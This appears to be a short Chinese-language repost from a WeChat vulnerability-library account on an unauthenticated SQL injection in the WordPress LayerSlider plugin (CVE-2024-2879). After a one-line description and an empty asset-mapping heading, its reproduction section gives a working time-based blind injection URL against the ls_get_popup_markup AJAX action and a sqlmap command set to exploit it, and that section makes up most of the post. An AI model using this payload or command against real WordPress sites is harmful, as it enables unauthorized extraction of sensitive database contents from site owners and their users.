漏洞描述
由于对用户提供的参数转义不充分以及缺少wpdb::prepare(),可能导致通过ls_get_popup_markup操作受到SQL注入攻击,未经身份验证的威胁者可利用该漏洞从数据库中获取敏感信息。
资产测绘
FOFA:
漏洞复现
http://site.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and (SELECT 6416 FROM (SELECT(SLEEP(5)))nEiK)-- vqlq sqlmap "https:://ip/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T
原文始发于微信公众号(漏洞文库):【漏洞复现】WordPress-LayerSlider存在SQL注入漏洞(CVE-2024-2879)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论